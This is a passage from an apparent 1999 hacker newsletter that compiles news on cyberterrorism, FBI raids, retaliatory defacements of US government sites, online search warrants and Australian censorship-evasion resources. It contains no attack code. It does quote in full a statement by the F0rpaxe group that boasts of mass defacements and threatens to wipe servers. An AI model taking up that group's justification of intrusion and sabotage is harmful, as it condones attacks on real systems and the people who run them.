market crashes and the panic --
occurred in 1997 when 35 hackers
hired by the National Security Agency launched simulated attacks on
the U.S. electronic infrastructure.
"Eligible Receiver," as the exercise
was called, achieved "root level"
access in 36 of the Department of
Defense's 40,000 networks. The
simulated attack also "turned off"
sections of the U.S. power grid,
"shut down" parts of the 911
network in Washington, D.C., and
other cities and gained access to
systems aboard a Navy cruiser at
sea.
At a hearing in November 1997,
Sen. Jon Kyl, R-Arizona, chairman of
a Senate technology subcommittee,
reported that nearly two-thirds of U.S. government computers
systems have security holes.
"If somebody wanted to launch an attack," says Fred B. Schneider, a
professor of computer science at Cornell University, "it would not be
at all difficult."
'There are lots of opportunities'
Although "Eligible Receiver" took place in the United States, which has
about 40 percent of the world's computers, the threat of
cyberterrorism is global.
Consider:
During the Gulf War, Dutch hackers stole information about U.S.
troop movements from U.S. Defense Department computers and
tried to sell it to the Iraqis, who thought it was a hoax and
turned it down.
In March 1997, a 15-year-old Croatian youth penetrated
computers at a U.S. Air Force base in Guam.
In 1997 and 1998, an Israeli youth calling himself "The Analyzer"
allegedly hacked into Pentagon computers with help from
California teen-agers. Ehud Tenebaum, 20, was charged in
Jerusalem in February 1999 with conspiracy and harming
computer systems.
In February 1999, unidentified hackers seized control of a British
military communication satellite and demanded money in return
for control of the satellite.
The report was vehemently denied by the British military, which
said all satellites were "where they should be and doing what
they should be doing." Other knowledgable sources, including
the Hacker News Network, called the hijacking highly unlikely.
"There are lots of opportunities," says Schneider. "That's very scary."
'The Holy Grail of hackers'
President Clinton announced in January 1999 a $1.46 billion initiative
to deal with U.S. government computer security -- a 40 percent
increase over fiscal 1998 spending. Of particular concern is the
Pentagon, the military stronghold of the world's most powerful nation.
"It's the Holy Grail of hackers," says computer security expert Rob
Clyde. "It's about bragging rights for individuals and people with weird
agendas."
Clyde is vice president and general manager of technical security for
Axent Technologies, a company headquartered in Rockville, Maryland,
that counts the Pentagon as one of its customers.
The Defense Department acknowledges between 60 and 80 attacks a
day, although there have been reports of far more than that.
The government says no top secret
material has ever been accessed by
these intruders, and that its most
important information is not online.
But the frustration is evident.
Michael Vatis, director of the FBI's
National Infrastructure Protection
Committee, told a Senate
subcommittee last year that tracing
cyberattacks is like "tracking vapor."
'A lot of clueless people'
Schneider says the "inherently
vulnerable" nature of the electronic
infrastructure makes counterterrorism
measures even more difficult.
Schneider chaired a two-year study
by the National Academy of Sciences
and the National Academy of
Engineering that found that the
infrastructure is badly conceived and
poorly secured.
"There is a saying that the amount of
'clue' [knowledge] on the Internet is
constant, but the size of the
Internet is growing exponentially,"
says Schneider. "In other words,
there are a lot of clueless people out
there. It's basically a situation where
people don't know how to lock the
door before walking out, so more and
more machines are vulnerable."
Schneider says the telephone system
is far more complicated than it used
to be, with "a lot of nodes that are
programmable, and databases that
can be hacked." Also, deregulation of
the telephone and power industries
has created another weakness: To
stay competitive and cut costs,
companies have reduced spare
capacity, leaving them more
vulnerable to outages and disruptions
in service.
Still another flaw is the domination of the telecommunications system
by phone companies and Internet service providers (ISPs) that don't
trust each other. As a result, the systems do not mesh seamlessly
and are vulnerable to failures and disruptions.
"There's no way to organize systems built on mutual suspicion,"
Schneider says. "We're subtly changing the underpinnings of the
system, but we're not changing the way they're built. We'll keep
creating cracks until we understand that we need a different set of
principles for the components to deal with each other."
'The democratization of hacking'
Meanwhile, the tools of mayhem are readily available.
There are about 30,000 hacker-oriented sites on the Internet, bringing
hacking -- and terrorism -- within the reach of even the technically
challenged.
"You no longer have to have knowledge, you just have to have the time," Clyde says. "You just
download the tools and the programs. It's the democratization of hacking. And with these
programs ... they can click on a button and send bombs to your network, and the systems will go
down."
Schneider says another threat is posed not by countries or terrorists, but by gophers and squirrels and
farmers.
In 1995, a New Jersey farmer yanked up a cable with his backhoe,
knocking out 60 percent of the regional and long distance phone
service in New York City and air traffic control functions in Boston,
New York and Washington. In 1996, a rodent chewed through a cable
in Palo Alto, California, and knocked Silicon Valley off the Internet for
hours.
"Although the press plays up the security aspect of hacker problems,"
says Schneider, "the other aspect is that the systems are just not
built very reliably. It's easy for operators to make errors, and a gopher
chewing on a wire can take out a large piece of the infrastructure.
That's responsible for most outages today."
'The prudent approach'
Schneider and Clyde favor a team of specialists similar to Clinton's
proposed "Cyber Corps" program, which would train federal workers to
handle and prevent computer crises. But they say many problems can
be eliminated with simple measures.
These include "patches" for
programs, using automated tools to
check for security gaps and
installing monitoring systems and
firewalls. Fixes are often free and
available on the Internet, but many
network administrators don't install
them.
A step toward deterrence was
taken in 1998 when CIA Director
George Tenet announced that the
United States was devising a
computer program that could attack
the infrastructure of other
countries.
"That's nothing new," says Clyde, "but it's the first time it was publicly
announced. If a country tries to destroy our infrastructure, we want
to be able to do it back. It's the same approach we've taken with
nuclear weapons, the prudent approach."
The U.S. Government Accounting Office estimates that 120 countries
or groups have or are developing information warfare systems. Clyde
says China, France and Israel already have them, and that some
Pentagon intrusions have surely come from abroad.
"We don't read about the actual attacks," says Clyde, "and you
wouldn't expect to."
"The Analyzer" was caught after he bragged about his feat in
computer chat rooms, but Clyde says the ones to worry about are
those who don't brag and don't leave any evidence behind.
"Those are the scary ones," he says. "They don't destroy things for
the fun of it, and they're as invisible as possible."
@HWA
04.0 The hacker from an administrator's point of view
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by System (Indonesia)
Note: be gentle, this was translated from Indonesian.(ESL)
Hacker : An overview from An Admin point of view.
by system ( 30 mei 1999 ).
Hacker's is an enemy
------------------
Yes, that's true. Hacker's is an enemy for an certain of administrators.
Because hacker's to them are very annoyying. They only give an admin a lot of job to do,
from just maintenance the network, now plus he must watch the network, find the hole in his
network, and finally fix his network. Not even in the case when the hacker's can get in to
their network and break / steal / and modify the data's from their network user computers.
Being an network adminitrator is not an easy way, not only he must know and understand how
the network goes, he also must have the capabilities to fix unknow error or hacker's intruders
in their network. [ This is what i call a good qualify admin ].
But, it is not an easy to find that kind of admin. In this world, there are to many admin that
only know how to maintenance the network but cannot to find the hole in their network, or even
he cannot fix the hole. What they think is " This is not my job, my job is only maintenance the
network, i dont know anything else ".
Well, this is the type of admin that call the hacker's an enemy, because they only think that
hacker only give them a job to do. Hacker's only trying to bring down their network. He never
think in the positive way.
But, is this true ??? ...
Hacker's is a friend.
--------------------
Yes, that's true. Hacker's is a friend for a certain of administrator. They give back their
passion of working become live again. The hacker's helping them for strengthen their network.
An administrator that call the hacker's as their friend is what i call an high dedication of
admin.
Why ?
Because that type of admin didn't think about the job that they must take, but they only think
that this is the right time that he has waiting for, it is a time that make their job's not
boring again, now they can find out the hole that exist in their network, and finally he can
fix the right hole in their network.
Do you ever fell how good is when you do what you like ?
If you do, that is the right felling that administrator fell too. They think hacker's is not
their enemy, but as their friend and their job mate that he must honouring them.
Summary
-------
- So, what is hackers to you ???
###########################################################################################
Any comment or suggestion are welcome, please send it to system@hackerlink.or.id
You also can see it on my website at http://www.hackerlink.or.id/?hack=artikel.htm
###########################################################################################
@HWA
05.0 Retaliation against the FBI continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Retaliation Against FBI Continues
contributed by mortel
The cracks of he US Senate web site and DoS attacks
against the FBI web site was not the end of the
protests over recent FBI actions. Last week the FBI
executed up to nine search warrants mostly against
members of a group known as gH or Global Hell. At this
time HNN is not aware of any arrests that have been
made. These actions by the FBI have upset a few
people and in retaliation have attacked the US
Department of Interior web site.
MSNBC
http://www.msnbc.com/news/273819.asp
Nando Times
http://www.techserver.com/story/body/0,1634,54975-87979-624391-0,00.html
ABC News
http://www.abcnews.go.com/sections/us/DailyNews/computer_hackers990531.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
F0rpaxe a group based in Portugal and with close
connections to gH has claimed responsibility for defacing
numerous web sites over the weekend (see list at
bottom) and have also released a statement expressing
their view about what has been going on.
F0rpaxe Statement
FORPAXE TECHNOLOGIES INC.
STATEMENT
F0rpaxe needs to inform all people what is going on. At this
moment and for what we know, F0rpaxe is the only Portuguese group
that is executing massive attacks on edu, gov , mil, com,servers.
Maybe this is the reason why F0rpaxe is now being wanted by PJ
(Portuguese police) and some international organizations like FBI
and Interpol. While we had been away for a few days we had watch
several events on the Portuguese media whitch in a certain way
implicates F0rpaxe. Some newspapers reported that PJ is now doing
their homework together with FBI to lock down "Hackers" who
aleggely are involved on US hacks.
Also PJ is now our BIG BROTHER since they are gathering efforts
to make a net surveillence over POrtugual. For what it seems they
have the help of Portuguese ISP's like Telapac. Their goal is to
track down hackers...
In an article of "EuroNoticias" they call hackers to the ones who
use trojans to steal accounts (l0l). If PJ thinks that this is
their biggest problem then that info about working together with
the FBI is a bulshit... Portugal is now passing through serious or
hilarious actions.. IF the goal of PJ is to track down people who
use trojans to steal accounts then they have to arrest all
population. We think that this isn't their main goal since F0rpaxe
had been informed that PJ is trying to get solide proofs that we
are the responsables for all those hacks.
PJ doesn't scare anyone. IF FBI is really working together with PJ
then they are doing this only because of us...most certainly to
erase us from the system... FBI had been mounting schemes to
track us down.... FBI had already tried to pretend being
Iron-Lungs to get info about our current hacks, if we still had
acess to gov servers, if we had copyed military databases and all
that sort of things...
The real I-L reported that the fake I-L wasn¥t him. The guy was
always asking things and we just ignored...it could be just
a lamer trying to get some info about us... But then the
attemptives to track us down started: the guy started to contact
people who are closed to F0rpaxe ,like some fo attrition staff, in
order to get our contact like phone etc... They even asked some of
them to phone us.... When they realized that we had discover they
started trying to get info from all those who surround us...a few
days later an article on a newspapper reported that FBI and PJ
were (or are?) working together... We don't know if all this is
the truth or only a misunderstanding but one thing we know FBI
really want us bad and they will do anything to caught us.
We think that FBI doesn't want us just because of all the hacks but
to show that they have the authoritie to arrest hackers of other
country's. Although they need the permissions of the government and
that isn't easy. They should be tired of making American Hackers
life miserable and now they want to do the same with us....... As
we told before we had been away for a while because things were
starting to be pretty badÖ
Groups who work on the shadow
Some groups just disappear but they don't disappear trully..They
start working on the shadow because FEDS are always ready to take
them down...We thought that it would't happen that with us but
sooner or later we will need to go back to where we belong...to
the shadow. We also take this chance to show our support with
people who are now facing legal troubles, like I-L, dk,
Zyklon.....Kevin and all the others who will face them in the
futureÖ gH has also our support.
Information in Portugal
Portuguese media isnÔt aware of all this.... neither some admins
who were hacked and nothing was reported....In Portugal people
don't care ab
out what happens...They aren't aware that there are
people building an underground system. Ity's just that. On CNN,
ZDNET, Wired etc.. they inform what's happening.... In Portugal
the media just doesn't give a shit.... Maybe this is the best for
us since this will prevent a media hype and PJ and other FEDS
won't be after us so soon..but information isn't circulating as
it should. People built a bad image of the "hacker". Portuguese
media report "hackers" as being the ones who use trojans...
Man....they arten't aware of the true meaning of the concept
"hacker" They should think about it...
Why are we doing this?
We agree with some of the things that had been said by some groups.
We are always hacking and for what? We hack and hack things whitch
can be fixed in 2 minutes. In fact we could have done worse like
destroying completely all servers. We can do it if we w ant but
hackers are waiting for justice. If FBI doesn¥t stop we won¥t and
we can start destroying. We think that FBI should explain what a
fuck they are doing. For the moment we won¥t destroy the servers
we hack but if it is necessary we can burn alot of servers. For
example this gov server could be erased completly. Everyone
should think about this, about what¥s happening.
Don't make all this a media hype just inform in a simple
manner....people need to know. People need to know why all this
hacks. People need to know who FBI really is.
MSNBC;
Tough talk amid new Web assaults
White House and federal agencies lay down the law
while computer attackers hit another federal Internet site
By Alan Boyle, Bob Sullivan and Brock Meeks
June 1 The White House, Pentagon, Justice Department and FBI all addressed a rash of
electronic attacks on federal Web sites Tuesday, even as the attackers hit new targets. The protest
campaign against last weeks FBI raids on computer users spilled across global cyberspace,
from the Pacific to Europe.
THE WEB ONSLAUGHT began nearly a week ago,
after FBI agents served search warrants on members of the
hacker community in Washington state, Texas, California
and other areas of the country.
The raids which were aimed at gathering evidence
related to past computer intrusions as well as unauthorized
use of telephone systems sparked attacks that forced the
shutdown of the FBI and U.S. Senate Web sites last week.
After beefing up security, the Senate site is back in service,
but the FBI site is still inaccessible.
Scores of protest pages have rudely taunted the FBI,
and government officials laid down the law at several news
briefings Tuesday.
Cyber-security is something the government takes
very seriously, White House spokesman Joe Lockhart said
in response to a reporters question. I know that there
have been a series of attempts (to break into government
computers) with some success, some without success. ...
We take it very seriously. We are constantly reviewing and
will continue to review the security measures we have.
Last month, a group known as Global Hell, or gH, was
implicated in attacks on the White House Web site as well
as sites for several Cabinet departments and the U.S.
Information Agency. Also last month, Global Hell member
Eric Burns, who also goes by the name Zyklon, was
indicted in connection with attacks on three computers,
including the USIA system.
White House Web site shut down
Lockhart emphasized that those implicated in the latest
wave of attacks were liable to face a similar fate.
For those who think that this is some sort of sport, I
think (it will be) less fun when the authorities do catch up
with them ... and these people are prosecuted, he said.
At another briefing, Pentagon spokesman Kenneth
Bacon said system administrators were briefly limiting Web
access Tuesday so they could beef up security.
He said such measures would make it much more
difficult to deface Pentagon Web pages.
It has not been a major problem, Bacon said. This is
much more protective than reactive. Its looking to the
future to prevent the types of problems (seen) at other
agencies.
Federal law-enforcement officials emphasized the harsh
criminal penalties that Web intruders could face: Attackers
who cause $5,000 worth of damage in one year could be
charged with a federal felony that carries up to five years in
prison, the head of the Justice Departments computer
crime section, Scott Charney, told The Associated Press.
Merely gaining unauthorized access to a government
computer could bring a year in jail, but Charney pointed out
that the cost of fixing a compromised Web site could mount
to $5,000 in employee time alone.
A Dallas telecommunications company suffered a
considerable loss perhaps ranging into millions of dollars
because of intrusions that are the subject of the FBIs
current investigation, bureau spokesman Frank Scafidi said.
What we investigate are violations of law, he told
MSNBC. If a hacker feels that our investigating
somebodys illegal activity is somehow an infringement on
that individuals freedom to do what he wants to do, then
there is a basic misunderstanding of the way this country
works.
Scafidi said there was no intention on our part to
select a group of people and pick on them. ... They get the
first move in this game.
But he also indicated that the justice system intended to
have the last word.
When there is a violation ... we will pursue it, and
usually we will knock on somebodys door and maybe take
some computer equipment, he said. Such equipment may
have to be held for months or years, to be used as evidence
in a trial or during the appeal process, he said.
As for the FBI sites down time, Scafidi said: That
isnt affecting the FBIs investigative response in any way. It
is a problem for us in that we rely on our Web site as a
place for anybody to go and get information on the FBI for
any purpose ... so it is a public information resource for us,
and since it has been down it has really been affecting a lot
of innocent parties out there.
THE LATEST VICTIMS
Tuesdays governmental victim was the General
Services Administration, which manages U.S. government
property. At least three pages on the Web site for the
GSAs Office of Governmentwide Policy
www.policyworks.gov were briefly replaced with
protest pages.
Our sentence is hacking everything we can as a
protest to FBI current actions, one page read.
The hacked pages were accessible for 10 to 15
minutes, said Joe McKay, director of office information
systems at the Office of Governmentwide Policy. He said
the attacker apparently gained access through a security gap
related to file transfer protocol, or FTP.
Weve terminated all FTP services, and I am issuing
on a need-to-use basis new FTP access, he told MSNBC.
The site was working normally Tuesday night, and computer
server logs were being analyzed for further clues, he said.
Were always playing catch-up, it seems, he said.
Its important to show (the attackers), Hey, you got us,
but were OK now.
The hacked pages claimed credit on behalf of a group
called Forpaxe, including a member using the handle
M1crochip. Similar credits appeared on hacked pages
placed Tuesday on Web servers at Monash University in
Australia and Coca-Colas Belgian subsidiary, as well as a
page that briefly appeared Monday at the Idaho National
Engineering and Environmental Labs Web site.
The hacked pages indicated that M1crochip lived in
Portugal which others in the hacker community
confirmed. Another computer user said to be involved in the
current wave of Web attacks reportedly lived in Britain.
BACKGROUND ON THE FBI RAIDS
Members of Global Hell reported that law-enforcement
officials served search warrants last Wednesday in Texas,
California and Washington state. AntiOnline, a Web site
focusing on the hacker community, indicated that the sweep
extended to other states as well.
One of the subjects of the search warrants was a
contractor working at Microsoft, which is a partner in the
joint venture that operates MSNBC. When contacted by
MSNBC, the contractor who uses the online handle
VallaH confirmed that nine law-enforcement agents
served him with a warrant at his Seattle-area apartment,
interrogated him and confiscated computer equipment.
He said he was not involved in any illegal activity and
surmised that he was implicated by a former associate in the
hacker community.
FBI agents also contacted Microsoft, said company
spokesman Adam Sohn.
This is an active investigation, and theres not a lot we
can say, Sohn said Monday. Its an FBI matter, its not a
Microsoft matter.
He indicated that FBI agents were interested in
computer equipment that VallaH used at Microsoft. As far
as I have been told, we are still in possession of the
property. However, were cooperating with the FBI in the
investigation, Sohn said.
VallaH said he was told not to report for work at
Microsoft.
We did ask that his assignment at Microsoft be
terminated. I dont know what his status is with his
contracting agency, Sohn said.
MEANWHILE, IN HOUSTON ...
In Houston, FBI spokesman Rolando Moss told
MSNBC that agents were investigating allegations of
computer intrusions involving, among others, a teen-ager
who uses the hacker handle Mosthated.
In telephone conversations with MSNBC, Mosthated
said that his home was raided at about 6 a.m. CT
Wednesday, and that family computer equipment was
confiscated. He said his parents were really mad. ... The
computer had all their financial information and stuff on it.
Mosthateds mother got on the line to read from the FBIs
receipt for the equipment and confirm that she was really
mad.
Mosthated said at least eight other people around the
country had been served with search warrants as part of a
huge hacker crackdown. Four other Houston-area
hackers, three in California and one in the Seattle area
reportedly received FBI visits. None was arrested, but all
had computer equipment confiscated, he said.
Media representatives at FBI offices in San Diego and
Seattle said they could not comment on the investigation.
Do you have a tip related to this story? Please
send your suggestions to tipoff@msnbc.com.
ABC;
Hackers Strike Again
Deface Interior Department and Supercomputer Lab Web Sites
By Ted Bridis
The Associated Press
W A S H I N G T O N, June 1 A spate of high-tech
vandalism against the government continued this
week, as computer hackers defaced two more
federal Web sites and left a taunting note
promising to attack other sites because of a
related FBI investigation.
Hackers from different organizations defaced Web
sites Monday for the Interior Department and a federal
supercomputer laboratory in Idaho Falls, Idaho, claiming
its our turn to hit them where it hurts.
These are the perils of open government, said
Stephanie Hanna, an Interior spokeswoman. We try to
make as much of the materials of the Interior Department
as open and available as possible. The consequence of
that is, those who choose to do damaging things can do
that.
Messages left at the attacked sites suggest they were
vandalized to retaliate against what was said to be the
FBIs harassment of specific hacker groups, including the
group that boasted of breaking into the White House site
last month.
The FBI confirmed it executed four search warrants
last week in Texas related to an investigation into
allegations of computer intrusion, including one search at
the home of a prominent hacker in Houston.
FBI Took Down Site Last Week
Last week, hackers claiming to be from another group
defaced the Web site for the Senate, causing it to be
taken offline through the weekend.
The FBI also was forced to take down its own
Internet site last week after hackers launched an electronic
attack against it. It remained inaccessible Monday, along
with the Web site for its National Infrastructure Protection
Center, which helps investigate computer crimes.
On Interiors Web page, the hackers left a message
Monday saying they were going after every computer on
the Net with a .gov (suffix). ... Well keep hitting them
until they get down on their knees and beg.
At the site maintained by the Idaho National
Engineering and Environmental Laboratory, a note
threatened the electronic destruction of the powerful
computers that serve pages on the Internet if the FBI
doesnt stop.
We could have done worse, like destroying
completely all servers, the note said. We can do it if we
want, but hackers are waiting for Justice.
Warnings of More to Come
In an online interview with The Associated Press, the
hacker claiming responsibility for the laboratory attack
warned that further FBI investigation would result in more
severe damage.
The hacker identified himself only as M1crochip, living
in Portugal and part of a group calling themselves
F0rpaxe. The interview was arranged through a mutually
trusted third party.
If FBI doesnt do anything and doesnt stop arresting
people and making our life miserable, each member of
F0rpaxe will discuss an eventual destruction of every
single server, he said. If that happens, everything goes
down.
He added, We dont want to proceed that way, and
called the electronic attacks the only resource of the
hacker community.
The FBI in Washington declined comment Monday.
Earlier this month, a grand jury in northern Virginia
indicted Eric Burns, 19, on three counts of computer
intrusion. Burns reportedly is known on the Internet as
Zyklon and is believed to be a member of the group that
claimed responsibility for the attacks on the White House
and Senate sites.
Zyklon was one of a dozen names listed on the
hacked version of the White House Web site, which was
altered overnight Sunday for a few minutes before
government computers automatically detected the
intrusion.
Burns was accused of breaking into a computer used
by the U.S. Information Agency between August 1998
and January 1999. The grand jury also said Burns broke
into two other computers, one owned by LaserNet of
Fairfax, Va., and the other by Issue Dynamics Inc. of
Washington.
Nando Times;
Two more federal Web sites hacked
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TED BRIDIS
WASHINGTON (June 1, 1999 7:40 a.m. EDT http://www.nandotimes.com) - A spate of
high-tech vandalism against the government continued this week as computer
hackers defaced two more federal Web sites and left a taunting promise to attack
other sites because of a related FBI investigation.
Hackers from different organizations defaced Web sites Monday for the Interior
Department and a federal supercomputer laboratory in Idaho Falls, Idaho, claiming
"it's our turn to hit them where it hurts."
"These are the perils of open government," said Stephanie Hanna, an Interior
spokeswoman. "We try to make as much of the materials of the Interior Department
as open and available as possible. The consequence of that is, those who choose
to do damaging things can do that."
Messages left at the attacked sites suggest they were vandalized to retaliate
against what was said to be the FBI's harassment of specific hacker groups,
including the group that boasted of breaking into the White House site last month.
The FBI confirmed it executed four search warrants last week in Texas related to an
investigation into allegations of computer intrusion, including one search at the
home of a prominent hacker in Houston.
Last week, hackers claiming to be from another group defaced the Web site for the
Senate, causing it to be taken offline through the weekend.
The FBI also was forced to take down its own Internet site last week after hackers
launched an electronic attack against it. It remained inaccessible Monday, along with
the Web site for its National Infrastructure Protection Center, which helps investigate
computer crimes.
On Interior's Web page, the hackers left a message Monday saying they were "going after
every computer on the Net with a .gov (suffix). ... We'll keep hitting them until they
get down on their knees and beg."
At the site maintained by the Idaho National Engineering and Environmental Laboratory, a
note threatened the electronic destruction of the powerful computers that "serve" pages
on the Internet "if the FBI doesn't stop."
"We could have done worse, like destroying completely all servers," the note said. "We
can do it if we want, but hackers are waiting for Justice."
In an online interview with The Associated Press, the hacker claiming responsibility for
the laboratory attack warned that further FBI investigation would result in more severe damage.
The hacker identified himself only as M1crochip, living in Portugal and part of a group calling
themselves F0rpaxe. The interview was arranged through a mutually trusted third party.
"If FBI doesn't do anything and doesn't stop arresting people and making our life miserable,
each member of F0rpaxe will discuss an eventual destruction of every single server," he said.
"If that happens, everything goes down."
He added, "We don't want to proceed that way," and called the electronic attacks the "only
resource" of the hacker community.
The FBI in Washington declined comment Monday.
Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts
of computer intrusion. Burns reportedly is known on the Internet as "Zyklon" and is believed to
be a member of the group that claimed responsibility for the attacks on the White House and Senate
sites.
"Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which
was altered overnight Sunday for a few minutes before government computers automatically detected
the intrusion.
Burns was accused of breaking into a computer used by the U.S. Information Agency between August
1998 and January 1999. The grand jury also said Burns broke into two other computers, one owned by
LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington.
@HWA
06.0 Threat to online privacy: The Search Warrant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
New Threat to Online Privacy, The Search Warrant
contributed by mortel
This article gives the impression that some of todays
legal practices are a good anti crime thing but judges
are handing out search warrants that cover online
communications like candy. That email from your doctor
is just as much fair game as the one from your secret
lover. Judges must be educated so that limits can be
placed on these things. A choice quote from the article
"AOL is extremely law-enforcement friendly," Ron Horack
of the Loudoun County, Va., sheriff's department said,
"They don't hold anything back."
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/privacy990528.html
What We Leave Behind
Online Activities Become Open Trail for Authorities
By Calvin Woodward
The Associated Press
L E E S B U R G, Va., May 28 Go for a walk,
drive a car or dance in the moonlight and
chances are, no one notices. Journey on the
Internet and a trail is left.
And police are hot on that trail in a growing number of
criminal investigations.
Armed with search warrants, police are looking into
the online activities of suspects, and sometimes victims, by
seizing evidence from Internet service providers and
finding material that people online never dreamed would
end up in the hands of the law.
Private e-mail between lovers. The threatening
missives of haters. The true identities of people hiding
behind screen names in a medium they thought was the
essence of secrecy.
Va. Sheriff Helps Get AOL Help
Ultimately, if you break the law, it can be traced, said
investigator Ron Horack of the Loudoun County, Va.,
sheriffs department. Horack helps police around the
country apply for search warrants to get material from the
county-based America Online, the worlds largest Internet
service provider with 18 million customers.
I know who you are and where you live, an
anonymous hatemonger e-mailed a 12-year-old girl in
Lancaster, Pa. By peeking into the accounts of Internet
providers, police can often say the same thing: They know
who the threatening people are and where they live.
This week federal authorities said they had charged a
northern Virginia pediatrician with possessing child
pornography after investigating his AOL account and
finding at least 22 explicit images sent to him via e-mail
over the course of nearly six months. They said they then
found more child pornography on his computer. The
doctor could not immediately be reached for comment.
Wide Powers of Warrant
With a warrant, law enforcement authorities can look at
the electronic mail and other online communications of
people suspected of a range of serious crimes, getting
information not just from a home computer but often the
company that provides the Internet, e-mail or chat service.
They can do the same with victims, in the process
seeing mail from people who corresponded with them but
had nothing to do with a crime. Everything from humdrum
to-do lists to love letters from illicit digital dalliances
becomes potential evidence, and eventually a matter of
public record.
It is a growing risk to privacy, said Marc Rotenberg,
executive director of the Electronic Privacy Information
Center, who says police should stick to traditional
methods such as stings, informants and forensic evidence,
which dont invade peoples communications.
Said Horack: If theyre going to use the Internet for
their crime, were going to use the Internet to catch them.
Used in Littleton Investigation
Authorities turned to AOL to see some of the online
activities of the two high school students who killed 13
other people and themselves in Littleton, Colo., last
month. Theyve used it to try to track down some of the
copycat threats that have closed many schools since.
They took the same route, thus far with inconclusive
results, after a woman in Pennsylvania was told in a chat
room, I guarantee you I will hurt you if you dont listen to
me, and when a man in New York was charged with
attempted murder of his wife, who, police say, was having
a passionate online encounter her husband happened to
see.
AOL is extremely law-enforcement friendly, Horack
said. They dont hold anything back.
America Online tells its nearly 18 million customers it
wont read or disclose private communication or personal
identifying information except under a valid legal
process.
Most ISPs Have Similar Rules
Other major Internet service providers, or ISPs, as well
as separate online e-mail services and Internet hubs like
Hotmail and Yahoo, say much the same, although the
disclaimers may be hard to find in screens of small print.
We have a long-standing policy of cooperation with
law enforcement, said AOL spokesman Rich DAmato.
Communications such as e-mail are disclosed only in
criminal investigations and with a warrant, he says. In
response to orders in civil cases, AOL may give out
information allowing someones real name to be matched
to a screen name.
So if a spouse is found to be having an online affair
with someone known only as Heart4U, the identity of that
cyberlover might eventually be uncovered in a divorce
proceeding.
Chat Rooms Not That Anonymous
Raytheon Inc. obtained subpoenas to identify 21 people,
most of them employees, said to have been spreading
corporate secrets and gripes in an anonymous online chat
room.
It then dropped a lawsuit it had brought against the 21,
each identified as John Doe, indicating to privacy
experts that the company had gone to court in the first
place only to learn the identities of the chatters. Four
employees quit; others entered corporate counseling.
Privacy advocates worry that authorities could go on
increasingly invasive fishing expeditions.
There are simply many more events that are recorded
(online) that would not be recorded in the physical world,
said Rotenberg. I think it is going to become an
enormous problem as people become more and more
dependent on ISPs.
Anonymous Options Fight Back
Meanwhile, tools continue to be developed to protect
anonymity a site called anonymizer.com, for one, will
relay e-mail, stripping out the senders identifying
information.
So far, at least, few warrants going to AOL look like
goose chases, an impression formed after a review of the
more than 100 that have been filed in Leesburg this year.
Most involve alleged pedophiles, stalkers and
harassers who have used the Internet to find prey and left
evidence of their intentions with victims or undercover
police.
Horack prepares warrant applications for police from
other parts of the country, some so new to digital
detective work they need their childrens help to get
online. Once they are approved by a magistrate, he takes
them to AOL and retrieves the information. Its almost a
full-time job, offered by the sheriff because the company
gives such a big boost to the county.
Works Well With Pedophile Search
The warrants are especially effective against child
pornographers, Horack says. Pedophiles are pack rats.
They dont throw away anything. Even when they do
delete material from their computer, it might be found at
the service provider.
In the case of the 12-year-old Pennsylvania girl,
nothing turned up in the AOL search. Most of the time,
something does.
For example, police in Hendersonville, Tenn., turned
to AOL to see the Internet activity of Dennis Wayne
Cope, 47, shot and found dead in a crawl space of his
home in February.
In an affidavit seeking access to Copes e-mail,
buddy list content and other online activities, police said
he had been corresponding online with the estranged wife
of suspect Robert Lee Pattee. They also say Pattees
hand print was found at the scene.
Pattee has been charged with first-degree murder.
@HWA
07.0 2600 in Aussieland bares its teeth at the current clampdown on The Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2600.org.au Issues Instructions for Legally
Circumventing the Law
contributed by webmaster
The Australian government is introducing internet
content regulation this week despite extensive
opposition from free speech advocates and technical
advisors. Given that fighting the law itself is now
apparently futile, 2600 Australia has critiqued the law
and described apparently legal ways in which you can
evade it. We're not sure what the fallout from spelling
out how to (legally) evade the law will be, but take a
look while you can...
2600.org.au 2600.org.au Issues Instructions for Legally
Circumventing the Law
contributed by webmaster
The Australian government is introducing internet
content regulation this week despite extensive
opposition from free speech advocates and technical
advisors. Given that fighting the law itself is now
apparently futile, 2600 Australia has critiqued the law
and described apparently legal ways in which you can
evade it. We're not sure what the fallout from spelling
out how to (legally) evade the law will be, but take a
look while you can...
2600.org.au
http://www.2600.org.au/censorship-evasion.html
Interesting reading, check it out.
Evading the Broadcasting Services Amendment (Online Services) Act
1999
by Dogcow
Reference Links:
US Mirror - US Mirror of this document (for obvious reasons)
http://members.xoom.com/2600aus/censorship-evasion.html
Broadcasting Services Amendment (Online Services) Act 1999 - PDF format
http://www.aph.gov.au/parlinfo/billsnet/99077.pdf
Broadcasting Services Amendment (Online Services) Act 1999 - HTML format
http://www.ozemail.com/~mbaker/amended.html
Senate Select Committee on Information Technologies - Index
http://www.aph.gov.au/hansard/senate/commttee/s-it.htm
Squid - an open source proxy server
http://www.nlanr.net/Squid/
NLANR Cache - an open proxy hierarchy
http://www.nlanr.net/Cache/
Anti CensorWare Proxy - Masks the URL you're accessing
http://ians.978.org/rdrp-c/
Free S/WAN - an IPSEC implementation for Linux
http://www.xs4all.nl/~freeswan
PGP - International download site
http://www.replay.com/menu/pgp.html
SSL - Open Source SSL implementation
http://www.openssl.org/
FTP by email - instructions
ftp://rtfm.mit.edu/pub/usenet/news.answers/internet-services/access-via-email
BugTraq Mailing List - Web Archive
http://www.netspace.org/lsv-archive/bugtraq.html
Words filtered by iFilter - Thanks to Danny Yee
http://www.anatomy.usyd.edu.au/danny/freedom/censorware/ifilter.html
Introduction
Australia's citizens are about to be subject to content regulation on the Internet following the introduction of an amendment to existing
legislation relating to broadcasting services. This legislation defines certain responsibilities for the ABA (Australian Broadcasting
Authority), the OFLC (Office of Film and Literature Classification) and any company or individual providing public access to "Internet
